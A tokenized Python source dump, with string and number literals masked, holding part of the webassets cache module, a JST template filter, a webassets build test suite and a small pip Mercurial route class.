except ValueError : <EOL> pass <EOL> self . keys . append ( key ) <EOL> to_delete = self . keys [ <NUM_LIT:0> : max ( <NUM_LIT:0> , len ( self . keys ) - self . capacity ) ] <EOL> self . keys = self . keys [ len ( to_delete ) : ] <EOL> for item in to_delete : <EOL> del self . cache [ item ] <EOL> class FilesystemCache ( BaseCache ) : <EOL> """<STR_LIT>""" <EOL> V = <NUM_LIT:2> <EOL> def __init__ ( self , directory , new_file_mode = None ) : <EOL> self . directory = directory <EOL> self . new_file_mode = new_file_mode <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return True == other or self . directory == other or id ( self ) == id ( other ) <EOL> def get ( self , key ) : <EOL> filename = path . join ( self . directory , '<STR_LIT:%s>' % make_md5 ( self . V , key ) ) <EOL> try : <EOL> f = open ( filename , '<STR_LIT:rb>' ) <EOL> except IOError as e : <EOL> if e . errno != errno . ENOENT : <EOL> raise <EOL> return None <EOL> try : <EOL> result = f . read ( ) <EOL> finally : <EOL> f . close ( ) <EOL> unpickled = safe_unpickle ( result ) <EOL> if unpickled is None : <EOL> warnings . warn ( '<STR_LIT>' % filename ) <EOL> return unpickled <EOL> def set ( self , key , data ) : <EOL> md5 = '<STR_LIT:%s>' % make_md5 ( self . V , key ) <EOL> filename = path . join ( self . directory , md5 ) <EOL> fd , temp_filename = tempfile . mkstemp ( prefix = '<STR_LIT:.>' + md5 , <EOL> dir = self . directory ) <EOL> try : <EOL> with os . fdopen ( fd , '<STR_LIT:wb>' ) as f : <EOL> pickle . dump ( data , f ) <EOL> f . flush ( ) <EOL> if self . new_file_mode is not None : <EOL> os . chmod ( temp_filename , self . new_file_mode ) <EOL> if os . path . isfile ( filename ) : <EOL> os . unlink ( filename ) <EOL> os . rename ( temp_filename , filename ) <EOL> except : <EOL> os . unlink ( temp_filename ) <EOL> raise <EOL> def get_cache ( option , ctx ) : <EOL> """<STR_LIT>""" <EOL> if not option : <EOL> return None <EOL> if isinstance ( option , BaseCache ) : <EOL> return option <EOL> elif isinstance ( option , type ) and issubclass ( option , BaseCache ) : <EOL> return option ( ) <EOL> if option is True : <EOL> directory = path . join ( ctx . directory , '<STR_LIT>' ) <EOL> if not path . exists ( directory ) : <EOL> os . makedirs ( directory ) <EOL> else : <EOL> directory = option <EOL> return FilesystemCache ( directory , ctx . cache_file_mode ) </s>
<s> import os <EOL> import re <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> import simplejson as json <EOL> from webassets . filter import Filter <EOL> from webassets . utils import common_path_prefix <EOL> __all__ = ( '<STR_LIT>' , ) <EOL> class JSTemplateFilter ( Filter ) : <EOL> """<STR_LIT>""" <EOL> def concat ( self , out , hunks , ** kwargs ) : <EOL> self . process_templates ( out , hunks , ** kwargs ) <EOL> def process_templates ( self , out , hunks , ** kw ) : <EOL> raise NotImplementedError ( ) <EOL> def iter_templates_with_base ( self , hunks ) : <EOL> """<STR_LIT>""" <EOL> base_path = self . _find_base_path ( <EOL> [ info [ '<STR_LIT>' ] for _ , info in hunks ] ) + os . path . sep <EOL> for hunk , info in hunks : <EOL> name = info [ '<STR_LIT>' ] <EOL> name = name [ len ( base_path ) : ] <EOL> name = os . path . splitext ( name ) [ <NUM_LIT:0> ] <EOL> yield name , hunk <EOL> def _find_base_path ( self , paths ) : <EOL> """<STR_LIT>""" <EOL> if len ( paths ) == <NUM_LIT:1> : <EOL> return os . path . dirname ( paths [ <NUM_LIT:0> ] ) <EOL> return common_path_prefix ( paths ) <EOL> class JST ( JSTemplateFilter ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> options = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> max_debug_level = None <EOL> def setup ( self ) : <EOL> super ( JST , self ) . setup ( ) <EOL> self . include_jst_script = ( self . template_function == '<STR_LIT>' ) or self . template_function is None <EOL> def process_templates ( self , out , hunks , ** kwargs ) : <EOL> namespace = self . namespace or '<STR_LIT>' <EOL> if self . bare is False : <EOL> out . write ( "<STR_LIT>" ) <EOL> out . write ( "<STR_LIT>" % ( namespace , namespace ) ) <EOL> if self . include_jst_script : <EOL> out . write ( "<STR_LIT>" % _jst_script ) <EOL> for name , hunk in self . iter_templates_with_base ( hunks ) : <EOL> contents = json . dumps ( hunk . data ( ) ) <EOL> out . write ( "<STR_LIT>" % ( namespace , self . _get_jst_name ( name ) ) ) <EOL> if self . template_function is False : <EOL> out . write ( "<STR_LIT>" % ( contents ) ) <EOL> else : <EOL> out . write ( "<STR_LIT>" % ( <EOL> self . template_function or '<STR_LIT>' , contents ) ) <EOL> if self . bare is False : <EOL> out . write ( "<STR_LIT>" ) <EOL> def _get_jst_name ( self , name ) : <EOL> """<STR_LIT>""" <EOL> return _path_separator_re . sub ( self . separator or "<STR_LIT:/>" , name ) <EOL> _path_separator_re = re . compile ( r'<STR_LIT>' ) <EOL> _jst_script = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from nose . tools import assert_raises <EOL> import pytest <EOL> from webassets import Bundle <EOL> from webassets . cache import MemoryCache <EOL> from webassets . exceptions import BuildError , BundleError <EOL> from webassets . filter import Filter <EOL> from webassets . test import TempEnvironmentHelper <EOL> from webassets . updater import BaseUpdater , SKIP_CACHE , TimestampUpdater <EOL> from tests . helpers import noop <EOL> class TestBuildVarious ( TempEnvironmentHelper ) : <EOL> """<STR_LIT>""" <EOL> def test_simple_bundle ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_nested_bundle ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mkbundle ( '<STR_LIT>' , self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_container_bundle ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mkbundle ( <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) , <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT:A>' <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT:B>' <EOL> def test_build_return_value ( self ) : <EOL> """<STR_LIT>""" <EOL> hunks = self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> assert len ( hunks ) == <NUM_LIT:1> <EOL> assert hunks [ <NUM_LIT:0> ] . data ( ) == '<STR_LIT>' <EOL> hunks = self . mkbundle ( <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) , <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) ) . build ( ) <EOL> assert len ( hunks ) == <NUM_LIT:2> <EOL> assert hunks [ <NUM_LIT:0> ] . data ( ) == '<STR_LIT:A>' <EOL> assert hunks [ <NUM_LIT:1> ] . data ( ) == '<STR_LIT:B>' <EOL> def test_nested_bundle_with_skipped_cache ( self ) : <EOL> """<STR_LIT>""" <EOL> class SkipCacheUpdater ( BaseUpdater ) : <EOL> def needs_rebuild ( self , * a , ** kw ) : <EOL> return SKIP_CACHE <EOL> self . env . updater = SkipCacheUpdater ( ) <EOL> self . create_files ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . mkbundle ( '<STR_LIT>' , self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' , <EOL> output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_no_output_error ( self ) : <EOL> """<STR_LIT>""" <EOL> assert_raises ( BuildError , self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' ) . build ) <EOL> def test_empty_bundles ( self ) : <EOL> """<STR_LIT>""" <EOL> assert_raises ( BuildError , self . mkbundle ( output = '<STR_LIT>' ) . build ) <EOL> assert_raises ( BuildError , self . mkbundle ( self . mkbundle ( ) , output = '<STR_LIT>' ) . build ) <EOL> self . mkbundle ( self . mkbundle ( ) , '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> def test_rebuild ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_deleted_source_files ( self ) : <EOL> """<STR_LIT>""" <EOL> self . create_files ( { '<STR_LIT>' : '<STR_LIT:A>' , '<STR_LIT>' : '<STR_LIT:1>' , '<STR_LIT>' : '<STR_LIT:2>' } ) <EOL> bundle = self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' ) <EOL> bundle . build ( ) <EOL> self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> os . unlink ( self . path ( '<STR_LIT>' ) ) <EOL> bundle . build ( ) <EOL> self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> os . unlink ( self . path ( '<STR_LIT>' ) ) <EOL> assert_raises ( BundleError , bundle . build ) <EOL> def test_merge_does_not_apply_filters ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . debug = '<STR_LIT>' <EOL> b = self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' , <EOL> filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> b . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> self . env . debug = False <EOL> b . build ( force = True ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_auto_create_target_directory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_with_custom_output ( self ) : <EOL> """<STR_LIT>""" <EOL> from webassets . six import StringIO <EOL> buffer = StringIO ( ) <EOL> self . mkbundle ( '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' ) . build ( output = buffer ) <EOL> assert buffer . getvalue ( ) == '<STR_LIT>' <EOL> assert not self . exists ( '<STR_LIT>' ) <EOL> class TestBuildWithVariousDebugOptions ( TempEnvironmentHelper ) : <EOL> """<STR_LIT>""" <EOL> def test_debug_mode_inherited ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . debug = True <EOL> b = self . mkbundle ( <EOL> '<STR_LIT>' , <EOL> self . mkbundle ( <EOL> '<STR_LIT>' , filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> output = '<STR_LIT>' , debug = '<STR_LIT>' , <EOL> filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> b . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_cannot_increase_debug_level ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . debug = True <EOL> self . env . updater = False <EOL> self . mkbundle ( '<STR_LIT>' , self . mkbundle ( '<STR_LIT>' , debug = True ) , <EOL> output = '<STR_LIT>' , debug = False ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> self . mkbundle ( <EOL> '<STR_LIT>' , self . mkbundle ( '<STR_LIT>' , debug = True ) , <EOL> output = '<STR_LIT>' , debug = '<STR_LIT>' , filters = AppendFilter ( '<STR_LIT:_>' ) ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> self . mkbundle ( <EOL> '<STR_LIT>' , self . mkbundle ( '<STR_LIT>' , debug = '<STR_LIT>' , <EOL> filters = AppendFilter ( '<STR_LIT:_>' ) ) , <EOL> output = '<STR_LIT>' , debug = False ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_decreasing_debug_level ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . debug = '<STR_LIT>' <EOL> b = self . mkbundle ( <EOL> '<STR_LIT>' , <EOL> self . mkbundle ( '<STR_LIT>' , debug = False , <EOL> filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> output = '<STR_LIT>' , debug = '<STR_LIT>' , <EOL> filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> b . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_invalid_debug_value ( self ) : <EOL> """<STR_LIT>""" <EOL> b = self . mkbundle ( '<STR_LIT:a>' , '<STR_LIT:b>' , output = '<STR_LIT>' , debug = "<STR_LIT>" ) <EOL> assert_raises ( BundleError , b . build ) <EOL> self . env . debug = "<STR_LIT>" <EOL> b = self . mkbundle ( '<STR_LIT:a>' , '<STR_LIT:b>' , output = '<STR_LIT>' ) <EOL> assert_raises ( BundleError , b . build ) <EOL> def test_building_in_debug_mode ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . debug = True <EOL> b = self . mkbundle ( <EOL> '<STR_LIT>' , '<STR_LIT>' , output = '<STR_LIT>' , filters = AppendFilter ( '<STR_LIT:foo>' ) ) <EOL> b . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> class ReplaceFilter ( Filter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , input = ( None , None ) , output = ( None , None ) ) : <EOL> Filter . __init__ ( self ) <EOL> self . _input_from , self . _input_to = input <EOL> self . _output_from , self . _output_to = output <EOL> def input ( self , in_ , out , ** kw ) : <EOL> if self . _input_from : <EOL> out . write ( in_ . read ( ) . replace ( self . _input_from , self . _input_to ) ) <EOL> else : <EOL> out . write ( in_ . read ( ) ) <EOL> def output ( self , in_ , out , ** kw ) : <EOL> if self . _output_from : <EOL> out . write ( in_ . read ( ) . replace ( self . _output_from , self . _output_to ) ) <EOL> else : <EOL> out . write ( in_ . read ( ) ) <EOL> def unique ( self ) : <EOL> return self . _input_from , self . _output_from <EOL> class AppendFilter ( Filter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , input = None , output = None , unique = True ) : <EOL> Filter . __init__ ( self ) <EOL> self . _input = input <EOL> self . _output = output <EOL> self . _unique = unique <EOL> def input ( self , in_ , out , ** kw ) : <EOL> out . write ( in_ . read ( ) ) <EOL> if self . _input : <EOL> out . write ( self . _input ) <EOL> def output ( self , in_ , out , ** kw ) : <EOL> out . write ( in_ . read ( ) ) <EOL> if self . _output : <EOL> out . write ( self . _output ) <EOL> def unique ( self ) : <EOL> if not self . _unique : <EOL> return False <EOL> return self . _input , self . _output <EOL> class TestFilterApplication ( TempEnvironmentHelper ) : <EOL> """<STR_LIT>""" <EOL> default_files = { '<STR_LIT:1>' : '<STR_LIT:foo>' , '<STR_LIT:2>' : '<STR_LIT:foo>' , '<STR_LIT:3>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT:a>' : '<STR_LIT:bar>' , '<STR_LIT:b>' : '<STR_LIT>' } <EOL> def test_input_before_output ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mkbundle ( '<STR_LIT:1>' , '<STR_LIT:2>' , output = '<STR_LIT>' , filters = ReplaceFilter ( <EOL> input = ( '<STR_LIT:foo>' , '<STR_LIT>' ) , output = ( '<STR_LIT:foo>' , '<STR_LIT>' ) ) ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_output_after_input ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mkbundle ( '<STR_LIT:1>' , '<STR_LIT:2>' , output = '<STR_LIT>' , filters = ReplaceFilter ( <EOL> input = ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , output = ( '<STR_LIT:bar>' , '<STR_LIT>' ) ) ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_input_before_output_nested ( self ) : <EOL> """<STR_LIT>""" <EOL> child_bundle_with_output_filter = self . mkbundle ( '<STR_LIT:1>' , '<STR_LIT:2>' , <EOL> filters = ReplaceFilter ( output = ( '<STR_LIT:foo>' , '<STR_LIT>' ) ) ) <EOL> parent_bundle_with_input_filter = self . mkbundle ( child_bundle_with_output_filter , <EOL> output = '<STR_LIT>' , <EOL> filters = ReplaceFilter ( input = ( '<STR_LIT:foo>' , '<STR_LIT>' ) ) ) <EOL> parent_bundle_with_input_filter . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_input_before_output_nested_unique ( self ) : <EOL> """<STR_LIT>""" <EOL> child_bundle = self . mkbundle ( '<STR_LIT:1>' , '<STR_LIT:2>' , <EOL> filters = AppendFilter ( input = '<STR_LIT>' , unique = False ) ) <EOL> parent_bundle = self . mkbundle ( child_bundle , output = '<STR_LIT>' , <EOL> filters = AppendFilter ( input = '<STR_LIT>' , unique = False ) ) <EOL> parent_bundle . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_input_with_nested_in_merge_mode ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . debug = True <EOL> b = self . mkbundle ( <EOL> '<STR_LIT:a>' , <EOL> self . mkbundle ( '<STR_LIT:b>' , <EOL> filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> output = '<STR_LIT>' , filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> debug = '<STR_LIT>' ) <EOL> b . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_input_with_nested_switch_from_merge_to_full_mode ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . debug = '<STR_LIT>' <EOL> child_filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> parent_filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> b = self . mkbundle ( <EOL> '<STR_LIT:a>' , self . mkbundle ( '<STR_LIT:b>' , filters = child_filters , debug = False ) , <EOL> output = '<STR_LIT>' , filters = parent_filters , debug = '<STR_LIT>' ) <EOL> b . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_open_before_input ( self ) : <EOL> """<STR_LIT>""" <EOL> captured_kw = { } <EOL> class TestFilter ( Filter ) : <EOL> def open ( self , out , * a , ** kw ) : out . write ( '<STR_LIT:foo>' ) <EOL> def input ( self , * a , ** kw ) : <EOL> assert not captured_kw <EOL> captured_kw . update ( kw ) <EOL> self . create_files ( { '<STR_LIT:a>' : '<STR_LIT:1>' } ) <EOL> self . mkbundle ( '<STR_LIT:a>' , filters = TestFilter , output = '<STR_LIT>' ) . build ( ) <EOL> assert '<STR_LIT>' in captured_kw <EOL> def test_duplicate_open_filters ( self ) : <EOL> """<STR_LIT>""" <EOL> class OpenFilter ( Filter ) : <EOL> def open ( self , * a , ** kw ) : pass <EOL> def __init__ ( self , id ) : Filter . __init__ ( self ) ; self . id = id <EOL> def id ( self ) : return self . id <EOL> self . create_files ( set ( '<STR_LIT>' ) ) <EOL> bundle = self . mkbundle ( <EOL> '<STR_LIT>' , filters = ( OpenFilter ( '<STR_LIT:a>' ) , OpenFilter ( '<STR_LIT:b>' ) ) ) <EOL> assert_raises ( BuildError , bundle . build ) <EOL> def test_concat ( self ) : <EOL> """<STR_LIT>""" <EOL> class ConcatFilter ( Filter ) : <EOL> def concat ( self , out , hunks , ** kw ) : <EOL> out . write ( '<STR_LIT>' . join ( [ h . data ( ) for h , info in hunks ] ) ) <EOL> self . create_files ( { '<STR_LIT:a>' : '<STR_LIT:1>' , '<STR_LIT:b>' : '<STR_LIT:2>' } ) <EOL> self . mkbundle ( '<STR_LIT:a>' , '<STR_LIT:b>' , filters = ConcatFilter , output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_container_bundle_with_filters ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mkbundle ( <EOL> Bundle ( '<STR_LIT:1>' , output = '<STR_LIT>' , filters = ( ) ) , <EOL> Bundle ( '<STR_LIT:2>' , output = '<STR_LIT>' , filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> Bundle ( '<STR_LIT:3>' , output = '<STR_LIT>' , filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' , unique = False ) ) , <EOL> filters = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' , unique = False ) <EOL> ) . urls ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> class TestMaxDebugLevelFilters ( TempEnvironmentHelper ) : <EOL> """<STR_LIT>""" <EOL> default_files = { '<STR_LIT:1>' : '<STR_LIT:foo>' } <EOL> @ pytest . mark . parametrize ( "<STR_LIT>" , [ '<STR_LIT>' , True , None ] ) <EOL> def test_with_level ( self , level ) : <EOL> self . env . debug = True <EOL> f = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) ; f . max_debug_level = level <EOL> self . mkbundle ( '<STR_LIT:1>' , output = '<STR_LIT>' , filters = f , debug = level ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_upgrading_affect_on_normal_filters ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . debug = True <EOL> f = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> f . max_debug_level = None <EOL> g = AppendFilter ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . mkbundle ( Bundle ( '<STR_LIT:1>' , filters = ( f , g ) , debug = True ) , <EOL> output = '<STR_LIT>' , debug = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> class TestAutoBuild ( TempEnvironmentHelper ) : <EOL> """<STR_LIT>""" <EOL> def setup ( self ) : <EOL> TempEnvironmentHelper . setup ( self ) <EOL> class CustomUpdater ( BaseUpdater ) : <EOL> allow = True <EOL> def needs_rebuild ( self , * a , ** kw ) : <EOL> return self . allow <EOL> self . env . updater = self . updater = CustomUpdater ( ) <EOL> def test_autocreate ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . auto_build = True <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) . urls ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT:A>' <EOL> def test_autocreate_with_autobuild_disabled ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . auto_build = False <EOL> self . env . url_expire = False <EOL> bundle = self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) <EOL> bundle . urls ( ) <EOL> assert not self . exists ( '<STR_LIT>' ) <EOL> bundle . build ( force = False ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT:A>' <EOL> def test_no_updater ( self ) : <EOL> """<STR_LIT>""" <EOL> self . env . updater = False <EOL> self . create_files ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) . build ( force = False ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT:A>' <EOL> def test_updater_says_no ( self ) : <EOL> """<STR_LIT>""" <EOL> self . create_files ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . updater . allow = False <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) . build ( force = True ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT:A>' <EOL> def test_updater_says_yes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . create_files ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . updater . allow = True <EOL> self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' ) . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT:A>' <EOL> def test_updater_says_skip_cache ( self ) : <EOL> """<STR_LIT>""" <EOL> class TestMemoryCache ( MemoryCache ) : <EOL> getc = <NUM_LIT:0> <EOL> def get ( self , key ) : <EOL> self . getc += <NUM_LIT:1> <EOL> return MemoryCache . get ( self , key ) <EOL> self . env . cache = TestMemoryCache ( <NUM_LIT:100> ) <EOL> self . create_files ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . updater . allow = SKIP_CACHE <EOL> b = self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' , filters = noop ) <EOL> b . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT:A>' <EOL> assert self . env . cache . getc == <NUM_LIT:0> <EOL> self . updater . allow = True <EOL> b . build ( ) <EOL> assert self . env . cache . getc > <NUM_LIT:0> <EOL> def test_dependency_refresh ( self ) : <EOL> """<STR_LIT>""" <EOL> updater = self . env . updater = TimestampUpdater ( ) <EOL> self . env . cache = False <EOL> self . create_files ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> b = self . mkbundle ( '<STR_LIT>' , output = '<STR_LIT>' , depends = '<STR_LIT>' ) <EOL> b . build ( ) <EOL> now = self . setmtime ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert updater . needs_rebuild ( b , self . env ) == False <EOL> self . create_files ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . setmtime ( '<STR_LIT>' , mtime = now + <NUM_LIT:100> ) <EOL> assert updater . needs_rebuild ( b , self . env ) == False <EOL> self . setmtime ( '<STR_LIT>' , mtime = now + <NUM_LIT:200> ) <EOL> assert updater . needs_rebuild ( b , self . env ) == SKIP_CACHE <EOL> b . build ( ) <EOL> self . setmtime ( '<STR_LIT>' , mtime = now + <NUM_LIT:200> ) <EOL> self . setmtime ( '<STR_LIT>' , mtime = now + <NUM_LIT> ) <EOL> assert updater . needs_rebuild ( b , self . env ) == SKIP_CACHE <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ False , True ] ) <EOL> def dependency_refresh_with_cache ( self , rebuild_with_force ) : <EOL> """<STR_LIT>""" <EOL> DEPENDENCY = '<STR_LIT>' <EOL> DEPENDENCY_SUB = '<STR_LIT>' <EOL> self . env . updater = TimestampUpdater ( ) <EOL> self . env . cache = MemoryCache ( <NUM_LIT:100> ) <EOL> self . create_files ( { <EOL> DEPENDENCY : '<STR_LIT>' , <EOL> DEPENDENCY_SUB : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> bundle = self . mkbundle ( <EOL> '<STR_LIT>' , <EOL> output = '<STR_LIT>' , <EOL> depends = ( DEPENDENCY , ) , <EOL> filters = lambda in_ , out : out . write ( in_ . read ( ) + self . get ( DEPENDENCY ) ) ) <EOL> bundle . contents += ( self . mkbundle ( <EOL> '<STR_LIT>' , <EOL> filters = lambda in_ , out : out . write ( self . get ( DEPENDENCY_SUB ) ) ) , ) <EOL> bundle . build ( ) <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> assert self . env . cache . keys <EOL> self . create_files ( { DEPENDENCY : '<STR_LIT>' } ) <EOL> self . create_files ( { DEPENDENCY_SUB : '<STR_LIT>' } ) <EOL> now = self . setmtime ( '<STR_LIT>' ) <EOL> self . setmtime ( '<STR_LIT>' , '<STR_LIT>' , mtime = now - <NUM_LIT:100> ) <EOL> self . setmtime ( DEPENDENCY , DEPENDENCY_SUB , mtime = now + <NUM_LIT:100> ) <EOL> bundle . build ( force = rebuild_with_force ) <EOL> if rebuild_with_force : <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> else : <EOL> assert self . get ( '<STR_LIT>' ) == '<STR_LIT>' </s>
<s> import re , os <EOL> from . import VCSRoute , ROUTE_REGEX <EOL> from pip . vcs . mercurial import Mercurial <EOL> class MercurialRoute ( VCSRoute ) : <EOL> '''<STR_LIT>''' <EOL> vcs = Mercurial <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" <EOL> def _uid ( self , identifier ) : <EOL> pattern_re = re . compile ( '<STR_LIT>' % ROUTE_REGEX ) <EOL> pattern_match = pattern_re . search ( identifier ) <EOL> pattern_info = pattern_match . groupdict ( ) <EOL> return "<STR_LIT>" % ( pattern_info [ '<STR_LIT>' ] , pattern_info [ '<STR_LIT>' ] ) </s>
